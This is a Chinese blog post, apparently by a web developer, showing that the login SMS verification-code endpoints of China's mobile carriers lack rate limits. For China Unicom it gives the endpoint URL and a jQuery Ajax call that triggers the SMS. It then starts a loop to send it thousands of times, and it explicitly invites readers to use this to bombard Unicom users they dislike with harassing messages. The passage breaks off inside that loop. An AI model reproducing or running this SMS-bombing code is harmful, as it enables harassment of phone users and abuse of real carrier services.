随意调用三大移动运营商网站的短信随机码发送服务,玩玩而已
这两天在做网站,用到了手机短信验证码。突然想起看看三个移动运营商的网站登录的时候,也有手机短信产生随机码,然后输入手机随机码来登录。经过分析后发现,三个运营商的手机随机码短信,都是通过Ajax方式请求的,而且都存在随意被第三方程序自动调用的情况。下面我们逐一看一看。 首先是联通的网站: 网址如下: http://www.10010.com/ 登陆部分的界面如下所示: 上图中点击就可以获取对应用户号码的随机密码,通过短信发送到用户手机中。我通过Chrome的Console看了一下他的客户端脚本,发现没有任何次数和时间上的限制,只要是联通的手机号即可。于是我使用Jquery调用Ajax的代码片段如下,有兴趣的可以使用这个代码给不喜欢的联通用户发送骚扰短信了。(手机号码我就不写了,呵呵) 1: $.ajax({ 2: cache: false, 3: type: "GET", 4: url: "http://www.10010.com/login/sendRadomPassword.action", 5: data: "mobile=132********" 6: }); 上述示例总是一次请求,如果非要在上面加一个次数的期限的话,他可以是一万次,或者一百万次。比如: 1: var sendTimes = 1000; 2: while (sendTimes > 0) { 3: $.ajax